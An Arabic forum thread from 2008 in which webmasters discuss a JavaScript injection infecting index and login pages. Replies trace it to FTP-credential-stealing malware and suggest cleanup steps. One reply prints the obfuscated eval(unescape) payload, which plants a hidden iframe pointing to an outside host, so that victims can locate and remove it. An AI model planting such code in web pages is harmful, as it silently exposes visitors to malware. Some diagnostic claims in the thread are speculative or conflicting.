يوم سوالف، في 7 أغسطس القادم

 

العودة   سوالف سوفت > قسم تطوير وبرمجة المواقع للمتقدمين > تطوير الويب
المدوّنات البحث مشاركات اليوم اجعل كافة المشاركات مقروءة

رد
 
LinkBack أدوات الموضوع
عضو فعال
تاريخ التسجيل: Aug 2007-
#1 (permalink)  
Angry فايروس المواقع .. ما السبب وكيفية الحماية .. دعوة للنقاش


فايروس المواقع
عبارة عن كود جافا سكربت يصيب صفحات الاندكس بالموقع
وقلما ما يصيب الصفحات الاخري
تكاثره عن طريق السيرفر
لانه يصيب حتي الصفحات التي تحتوي علي جدار ناري وكلمات مرور

اريد ان اعرف من هو السبب في اصابة موقعي بهذا الفايروس
وهل السبب في ذلك هو رفعي لملف مصاب وهذا اشك فيه لاني مثبت كاسبر سكاي والذي يرفض حتي مجرد التفكير في تنزيل الملف المصاب علي الجهاز
ام ان السبب هو السيرفر
فالسيرفر حتي لا يحتوي علي اداة اسكان في السي بانل
واذا كان من السيرفر لماذا اصاب هذا الموقع فقط ولم يصيب باقي المواقع الموجودة في الريسلر

ارجو النصح من اخواني
فقد استخدمت محرك البحث ولم اجد معلومة مؤكدة في هذا الموضوع






__________________
... ... ... ... ... ... ... ... ... ... ... ... ... ...
منتديات أمل الأمة .. يد بيد نحيي الأمة
www.amlalommah.info
... ... ... ... ... ... ... ... ... ... ... ... ... ...
سحاب اون لاين متواجد حالياً   قديم 21-03-2008, 07:55 PM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: Mar 2008-
#2 (permalink)  

الحماية من المضيف اخي
لقد انتشرت بشكل هائل
ختا يوجد 4 فيروسات يعدلون php و يضعون اعلانات اباحية
يجب التصدي لها بتشفير الملفات فقط






HAMOUD131 غير متواجد حالياً   قديم 21-03-2008, 08:20 PM
رد مع اقتباس
عضو فعال
تاريخ التسجيل: Aug 2007-
#3 (permalink)  

شكرا علي المشاركة






__________________
... ... ... ... ... ... ... ... ... ... ... ... ... ...
منتديات أمل الأمة .. يد بيد نحيي الأمة
www.amlalommah.info
... ... ... ... ... ... ... ... ... ... ... ... ... ...
سحاب اون لاين متواجد حالياً   قديم 21-03-2008, 08:28 PM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: Sep 2007-
#4 (permalink)  

أنا كنت من المصابين بهذا المزعج
الفيروس موجود عندك بالجهاز
سوي له فورمات أو إحذف برنامج FTP
طريقة حذف المزعج من الموقع
تدخل السبانل وتعدل جميع الملفات التي تحمل اسم index.html / index.php / index.htm






__________________
www.chariha.com/vb
عالم من الهواتف يناديكم

abdellahjawal غير متواجد حالياً   قديم 21-03-2008, 08:53 PM
رد مع اقتباس
مشرف قسم ويب 2.0 و البرمجة القياسية
تاريخ التسجيل: Jun 2005-
#5 (permalink)  

فيروسات جافاسكريبت javascript malware قد تستخدم اى من الطريقتين XSS او CSRF و من خلالها يمكن مسح العضاء او التعديل على تصميم الموقع او عمل أى شىء لأنه بمنتهى البساطه بمكنه الحصول على باسورد الادمن من خلال سطرين كود ...

الحمايه منه كالاتى :
1- إستخدام برمجيه امنه مع العلم بأى اكبر البرمجيات مثل VB و ال wordpress تكون مصابه بمثل هذا الثغرات XSS و CSRF و حالما يتم اكتشافها يتم اغلاقها فلذلك قم بمتابعه موقع milw0rm.com الذى يحتوى على كل الجديد من ناحيه ثغرات المواقع و قم بإغلاقه
2- اذا كنت انت مبرمج فقم بإتباع الخطاوات الصحيحه لعمل validation لأى بيانات يقوم ادخالها المستخدم لأن الاكواد الخبيثه ليس شرط ان تكون داخل ملفات ... ممكن يتم ادخالها بشكل طبيعى على هيئه نص و يتم ترجمتها

فيروسات جافاسكريبت javascript malware لا يتم إصطيادها بواسطه اى برنامج فيروسات لأنها ذكيه جدا و غالبه ماتستخدم reverse engineering و بعض التقنيات مثل morphing حتى تتخطى أى filter






__________________
Keepondev | مدونه شديد التخصص فى الجافاسكربت

ماذا يمكننى أن أفعل إذا تعلمت جافاسكريبت ??
Dezology غير متواجد حالياً   قديم 21-03-2008, 11:09 PM
رد مع اقتباس
مشرف أخبار الانترنت و التقنية و مناقشاتها
تاريخ التسجيل: Dec 2004-
#6 (permalink)  

السلام عليكم

موقع السيارات لما ادخله الكاسير يصاد تروجات تفضلوا

نادي السيارات - موقع سيارات يختص بـ صور و في&#

هل هو نفس النوع والا ما يصيد معكم شي ؟

ابوهيثم






__________________
شكرا دائماً وابداً يا عبدالرحمن [العنكبوتي]

شبكة البرامج العربية والمعربة
منتديات فاول الرياضي
مدونة فضفضة

مواضيعي وردودي تمثلني فقط
أبوهيثم متواجد حالياً   قديم 22-03-2008, 12:22 AM
رد مع اقتباس
عضو فعال
تاريخ التسجيل: Aug 2007-
#7 (permalink)  

اقتباس:
المشاركة الأصلية كتبت بواسطة abdellahjawal مشاهدة المشاركة
أنا كنت من المصابين بهذا المزعج
الفيروس موجود عندك بالجهاز
سوي له فورمات أو إحذف برنامج FTP
طريقة حذف المزعج من الموقع
تدخل السبانل وتعدل جميع الملفات التي تحمل اسم index.html / index.php / index.htm
اخي لا اظن مطلقا ان يكون الفايروس من جهازي
لسببين : الاول ان الكاسبر يمنع دخول هذا الموقع نهائيا
ثانيا لا استطيع تنزيل اي ملف من الملفات المصابة بسبب منع الكاسبر






__________________
... ... ... ... ... ... ... ... ... ... ... ... ... ...
منتديات أمل الأمة .. يد بيد نحيي الأمة
www.amlalommah.info
... ... ... ... ... ... ... ... ... ... ... ... ... ...
سحاب اون لاين متواجد حالياً   قديم 22-03-2008, 12:57 AM
رد مع اقتباس
عضو فعال
تاريخ التسجيل: Aug 2007-
#8 (permalink)  

اقتباس:
المشاركة الأصلية كتبت بواسطة Dezology مشاهدة المشاركة
فيروسات جافاسكريبت javascript malware قد تستخدم اى من الطريقتين XSS او CSRF و من خلالها يمكن مسح العضاء او التعديل على تصميم الموقع او عمل أى شىء لأنه بمنتهى البساطه بمكنه الحصول على باسورد الادمن من خلال سطرين كود ...

الحمايه منه كالاتى :
1- إستخدام برمجيه امنه مع العلم بأى اكبر البرمجيات مثل VB و ال wordpress تكون مصابه بمثل هذا الثغرات XSS و CSRF و حالما يتم اكتشافها يتم اغلاقها فلذلك قم بمتابعه موقع milw0rm.com الذى يحتوى على كل الجديد من ناحيه ثغرات المواقع و قم بإغلاقه
2- اذا كنت انت مبرمج فقم بإتباع الخطاوات الصحيحه لعمل validation لأى بيانات يقوم ادخالها المستخدم لأن الاكواد الخبيثه ليس شرط ان تكون داخل ملفات ... ممكن يتم ادخالها بشكل طبيعى على هيئه نص و يتم ترجمتها

فيروسات جافاسكريبت javascript malware لا يتم إصطيادها بواسطه اى برنامج فيروسات لأنها ذكيه جدا و غالبه ماتستخدم reverse engineering و بعض التقنيات مثل morphing حتى تتخطى أى filter
اولا يا اخي الموقع برمجة خاصة
ثانيا الموقع لم اعلن عن بعد ولم ينزل له ترتيب في اليكسا
ولم يؤرشف صفحة واحدة منه في جوجل
وكأني الوحيد الذي يعلم بهذا الموقع
فلا اظن ان احد حاول اختراق موقعي
فهل ينطبق علي كلامكم ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟






__________________
... ... ... ... ... ... ... ... ... ... ... ... ... ...
منتديات أمل الأمة .. يد بيد نحيي الأمة
www.amlalommah.info
... ... ... ... ... ... ... ... ... ... ... ... ... ...
سحاب اون لاين متواجد حالياً   قديم 22-03-2008, 12:59 AM
رد مع اقتباس
عضو فعال
تاريخ التسجيل: Aug 2007-
#9 (permalink)  

اقتباس:
المشاركة الأصلية كتبت بواسطة أبوهيثم مشاهدة المشاركة
السلام عليكم

موقع السيارات لما ادخله الكاسير يصاد تروجات تفضلوا

نادي السيارات - موقع سيارات يختص بـ صور و في&#

هل هو نفس النوع والا ما يصيد معكم شي ؟

ابوهيثم
نعم هو
غير ان موقعي الكاسبر يمنع دخوله نهائيا
اقصد الصفحات المصابة فقط






__________________
... ... ... ... ... ... ... ... ... ... ... ... ... ...
منتديات أمل الأمة .. يد بيد نحيي الأمة
www.amlalommah.info
... ... ... ... ... ... ... ... ... ... ... ... ... ...
سحاب اون لاين متواجد حالياً   قديم 22-03-2008, 01:01 AM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: Sep 2007-
#10 (permalink)  

انت مصاب به ولم يكتشفه الكاسبر لأنه عادي






__________________
www.chariha.com/vb
عالم من الهواتف يناديكم

abdellahjawal غير متواجد حالياً   قديم 22-03-2008, 01:24 AM
رد مع اقتباس
عضو فعال
تاريخ التسجيل: Aug 2007-
#11 (permalink)  

اقتباس:
المشاركة الأصلية كتبت بواسطة abdellahjawal مشاهدة المشاركة
انت مصاب به ولم يكتشفه الكاسبر لأنه عادي
هيا نتناقش
اولا الكاسبر اللي عندي اخر نسخة ومحدثة لاخر يوم
ثانيا الكاسبر لا يقبل تصفح الموقع ولا حتي المرور عليه
ثالثا الكاسبر يمنع نزول اي ملف مصاب عن طريق الاف تي بي او اي برنامج تحميل اخر
عند محاولة تعديل الملف عن طريق السي بانل الكاسبر يمنع دخول صفحة التعديل لاحتوائها علي كود الفايروس

فكيف بعد كل هذا
يكون جهازي مفيرس ولا يكتشفه الفايروس ؟






__________________
... ... ... ... ... ... ... ... ... ... ... ... ... ...
منتديات أمل الأمة .. يد بيد نحيي الأمة
www.amlalommah.info
... ... ... ... ... ... ... ... ... ... ... ... ... ...
سحاب اون لاين متواجد حالياً   قديم 22-03-2008, 02:41 AM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: Sep 2007-
#12 (permalink)  

ماادري كيف ستفهم
المهم كلامي واضح






__________________
www.chariha.com/vb
عالم من الهواتف يناديكم

abdellahjawal غير متواجد حالياً   قديم 22-03-2008, 03:48 PM
رد مع اقتباس
عضو سوبر نشيط
تاريخ التسجيل: May 2007-
#13 (permalink)  

اقتباس:
اولا الكاسبر اللي عندي اخر نسخة ومحدثة لاخر يوم
ثانيا الكاسبر لا يقبل تصفح الموقع ولا حتي المرور عليه
ثالثا الكاسبر يمنع نزول اي ملف مصاب عن طريق الاف تي بي او اي برنامج تحميل اخر

بعض الفيروسات عند اصابتها الجهاز تأخذ الأمان من مكافح الفيروسات المتواجد على الجهاز


بحيث يراها ملف طبيعي ولا يوجد به اي مشكله






Legend KSA متواجد حالياً   قديم 22-03-2008, 09:28 PM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: Aug 2007-
#14 (permalink)  

سلام عليكم

هذا جافا سكربت خبيثة لفايروس يجى بهذه الملفات

Index.php سواء بالمنتدى او بسكربت معين

وأحيانا يصيب logain .php

الحل . .

1- قم بحذف الجافا يدويأ من الملف

2- اعطى الملف تصريح 444

وان شاء الله ينظبط معك . . .

تحياتى






__________________
انجاز هوست

www.injaz4host.com

admin@injaz4host.com
انجاز هوست غير متواجد حالياً   قديم 23-03-2008, 02:39 AM
رد مع اقتباس
عضو فعال
تاريخ التسجيل: Aug 2007-
#15 (permalink)  

شكرا انجاز هوست
معلومات قيمة
ساقوم بتجربتها
وشكرا لباقي الاخوة الكرام علي المشاركة






__________________
... ... ... ... ... ... ... ... ... ... ... ... ... ...
منتديات أمل الأمة .. يد بيد نحيي الأمة
www.amlalommah.info
... ... ... ... ... ... ... ... ... ... ... ... ... ...
سحاب اون لاين متواجد حالياً   قديم 23-03-2008, 03:22 AM
رد مع اقتباس
عضو فعال
تاريخ التسجيل: May 2006-
#16 (permalink)  

بالفعل اصبت به قبل فترة على الاندكس

والكاسبر الوحيد الى كشفه

ولما بحث عنه تبين انه كود في الصفحة قمت بازالته والامر اصبح تمام



المشكلة انه قوقل كان معتبر الموقع مضر وحاطط تحذير عليه

ولكن بعد فترة لوحدهم رفعوا الحظر بعدما اتضح لهم انني شلت الكود


....


الان الفايرس هاد هل هو من ملف مصاب على الجهاز تم رفعه للموقع

أم أن الفايرس من السيرفر

؟؟؟؟






__________________
مهندس أحمد
إتصالات وإلكترونيات
مسلم عربي فلسطيني
I Allah

مرئية فلسطين على اليوتيوب

خلجات قلب ....
مهندس أحمد غير متواجد حالياً   قديم 23-03-2008, 04:53 AM
رد مع اقتباس
عضو فعال
تاريخ التسجيل: Aug 2007-
#17 (permalink)  

ننتظر الاجابة لسؤال المهندس احمد






__________________
... ... ... ... ... ... ... ... ... ... ... ... ... ...
منتديات أمل الأمة .. يد بيد نحيي الأمة
www.amlalommah.info
... ... ... ... ... ... ... ... ... ... ... ... ... ...
سحاب اون لاين متواجد حالياً   قديم 23-03-2008, 06:19 PM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: Sep 2007-
#18 (permalink)  

اخوي الفيروس (المزعج) موجود بجهازك
لما تدخل الافتيبي تلقائيا يزرع في الصفحات (الاندكس)
أما إذا دخلت السبانل لن يدخل المزعج الصفحات

أتمنى انكم فهمتم






__________________
www.chariha.com/vb
عالم من الهواتف يناديكم

abdellahjawal غير متواجد حالياً   قديم 23-03-2008, 09:49 PM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: Jun 2007-
#19 (permalink)  

اقتباس:
المشاركة الأصلية كتبت بواسطة abdellahjawal مشاهدة المشاركة
اخوي الفيروس (المزعج) موجود بجهازك
لما تدخل الافتيبي تلقائيا يزرع في الصفحات (الاندكس)
أما إذا دخلت السبانل لن يدخل المزعج الصفحات

أتمنى انكم فهمتم
فعلا الكود دا لقيتة فى موقع عندى فى صفحات الاندكس وال NOD 32 ماكتشفوش عندى مع انى بحدثة كل يوم

وانا شيلتة يدوى ولكن نزل تانى لانة كان فية صفحة مشيلتهاش لانة الظاهر بينتشر تانى لواحدة على الملفات كلها تانى بس الحمد لله تخلصت منة خالص

المهم الوقتى هو لو زى مابتقول على الجهاز فاية الطريقة الى نشيله بها ؟
لان النود مش واخد بالة منة خالص






gptmatrix.com غير متواجد حالياً   قديم 23-03-2008, 11:42 PM
رد مع اقتباس
عضو نشيط جدا
تاريخ التسجيل: May 2007-
#20 (permalink)  

اقتباس:
المشاركة الأصلية كتبت بواسطة أبوهيثم مشاهدة المشاركة
السلام عليكم

موقع السيارات لما ادخله الكاسير يصاد تروجات تفضلوا

نادي السيارات - موقع سيارات يختص بـ صور و في&#

هل هو نفس النوع والا ما يصيد معكم شي ؟

ابوهيثم
الكاسبر عندي وصاده






فيصل السلوم غير متواجد حالياً   قديم 24-03-2008, 12:06 PM
رد مع اقتباس
عضو فعال
تاريخ التسجيل: Aug 2004-
#21 (permalink)  

طيب حتى تعرف انه من السيرفر او من جهازك , ارفع ملف فارغ الى السيرفر, فاذا اضاف السيرفر كود للملف الفارغ فالمشكله من السيرفر اكيد , واذا لم يضيف فهناك احتمال ان تكون المشكله من جهازك...

يعني ارفع ملف index.php خالي من المحتويات الى الموقع وانظر هل اضاف السيرفر له اكواد جديده ام لا؟

انا اتوقع ان المشكله من السيرفر يوجد به تروجان يضيف محتويات لصفحات المواقع

أو جرب ترفع صفحاتك لسيرفر اخر وانظر هل تطلع نفس المشكله او لا


الافضل هو انك تكتب اسم الفايروس هنا حتى نبحث عنه ومعرفة طريقة عمله






__________________
>> يشدني ريح العطر في ثيابه !!!!!!!
PHP Expert غير متواجد حالياً   قديم 24-03-2008, 01:26 PM
رد مع اقتباس
عضو جديد
تاريخ التسجيل: Jan 2008-
#22 (permalink)  

السلام عليكم ورحمة الله وبركاته
باذن الله سوف اعطيكم ملخص لهذا اللعين لأني تعاملت معه منذ لحظة الاكتشاف مرورا بالتقصي والتتبع انتهائا بالتطهير
اولا الامر ينشأ من فايرس يصيب جهازك وليس من الضروري يكون جهازك فربما تستخدم ال ftp لموقعك انت واشخاص اخرون فربما المصاب هو جهاز احدهم
كيف يعمل ؟
الفايرس يسوي اتصال عبر برنامج ال ftp ثم يرسل بيانات الموقع الى سيده وهو يحمل هذا الاي بي 85.17.230.150 ( ليس بالضرورة ان يظل يستخدم هذا الاي بي مدى الحياة فمن الذكاء تغيير الاي بي باستمرار )
كيفية العلاج
اولا بحظر الاي بي وذلك يتم بالرجوع اولا الى لوق السيرفر ومعرفة اي بي عدونا اللدود
ثانيا هذا الفايروس شديد الدهاء عبقري يصيب اشد اسماء الصفح شهرة وباي امتداد وسوف اعطيكم ملخص باسماء هذه الصفحات
"main,index,default,login,header,footer"
افتح اي ملف يحمل هذا الاسم واحذف منه كود الجافا والذي سوف اكتبه الان لسببين اولهم حتى تقوموا بحذفه الثاني حتى يصل الينا من محركات البحث كل من اصابه هذا اللعين فلطالما بحثت واستغثت بقووقل ولكن لم اجد من يتكلم عن هذا اللعين واعتقد اننا اول موقع يتكلم عنه وقووقل يشهد
كود:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%39%61%30%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%39%37%37%33%39%38%35%33%30%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%31%31%33%36%29%2b%27%34%39%31%5c%27%20%77%69%64%74%68%3d%33%35%36%20%68%65%69%67%68%74%3d%32%35%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
تحياتي للجميع واسأل الله ان اكون قد وفقت في حل مشاكلكم






دعمي متواجد حالياً   قديم 24-03-2008, 03:59 PM
رد مع اقتباس
عضو نشيط
تاريخ التسجيل: Jun 2005-
#23 (permalink)  

السلام عليكم ورحمة الله وبركاته
سبب الفايروس والاصابة الحقيقية في بدايتها تكون في ثيمات ويندوز فيستا فهذا الفايروس مزروع في ثيمات فيستا وحين يقوم احد بتحميل الثيم ويركبه يحصل ما يحصل بالنسبة للفايروس ويقوم بعمله والكاسبر لا يكشف الفايروس قبل تثبيت الثيم ويكشفه بعد القيام بتثبيته وهذا ما حصل معي شخصيا

بالاضافة لما ذكره الاخ دعمي بقي امرين للحماية

1- احذف كافة حسابات الاف تي التي تقوم بحفظها في برنامج الاف تي بي الذي تستخدمه على جهازك ولا تقم بحفظ اي بيانات موقع في البرنامج

2- عدل كلمات المرور للوحة التحكم وحسابات الاف تي بي

وعلى مسؤوليتي ان عاد مرة اخرى
بالتوفيق






Eng_Man غير متواجد حالياً   قديم 24-03-2008, 06:19 PM
رد مع اقتباس
رد


أدوات الموضوع

تعليمات المشاركة
لا تستطيع كتابة مواضيع
لا تستطيع كتابة ردود
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
مواعيد الدراسة للعشر سنوات القادمة KSA mad921 سوالف عامة 5 01-11-2007 05:41 PM
المواقع الشخصية ...الى متى .. تكرار .....دعوة لتوحيد المواقع والجهود الشخصية ..شارك المعاصر أخبار الإنترنت والتقنية ومناقشتها 2 17-02-2001 12:56 AM
المواقع الشخصية ...الى متى .. تكرار .....دعوة لتوحيد المواقع والجهود الشخصية ..شارك المعاصر تطوير الويب 8 25-04-2000 11:21 PM
المواقع الشخصية ...الى متى .. تكرار .....دعوة لتوحيد المواقع والجهود الشخصية ..شارك المعاصر تطوير الويب 1 21-04-2000 03:04 PM
المواقع الشخصية ...الى متى .. تكرار .....دعوة لتوحيد المواقع والجهود الشخصية ..شارك المعاصر سوالف عامة 0 16-04-2000 10:02 AM


الساعة الآن: 11:04 AM بتوقيت المملكة العربية السعودية